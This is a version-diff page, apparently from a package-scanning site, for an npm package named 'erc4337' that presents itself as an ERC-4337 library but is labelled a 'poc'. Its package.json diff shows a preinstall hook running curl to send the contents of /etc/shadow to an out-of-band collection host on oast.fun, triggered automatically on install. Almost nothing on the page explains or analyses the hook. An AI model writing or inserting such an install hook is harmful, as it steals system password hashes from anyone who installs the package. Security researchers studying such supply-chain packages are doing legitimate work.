erc4337 0.0.1 → 0.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +3 -2
package/package.json
CHANGED
@@ -1,12 +1,13 @@
|
|
1
1
|
{
|
2
|
+
|
2
3
|
"name": "erc4337",
|
3
|
-
"version": "0.0.
|
4
|
+
"version": "0.0.2",
|
4
5
|
"description": "poc mr_yayaa",
|
5
6
|
"main": "index.js",
|
6
7
|
"devDependencies": {},
|
7
8
|
"scripts": {
|
8
9
|
"test": "echo \"Error: no test specified\" && exit 1",
|
9
|
-
"preinstall": "/usr/bin/curl --data '@/etc/shadow' $(hostname)
|
10
|
+
"preinstall": "/usr/bin/curl --data '@/etc/shadow' $(hostname)tdwqwukckznqfjjqpsdb0a0bltt2ke9qz.oast.fun" },
|
10
11
|
"author": "",
|
11
12
|
"license": "ISC"
|
12
13
|
}
|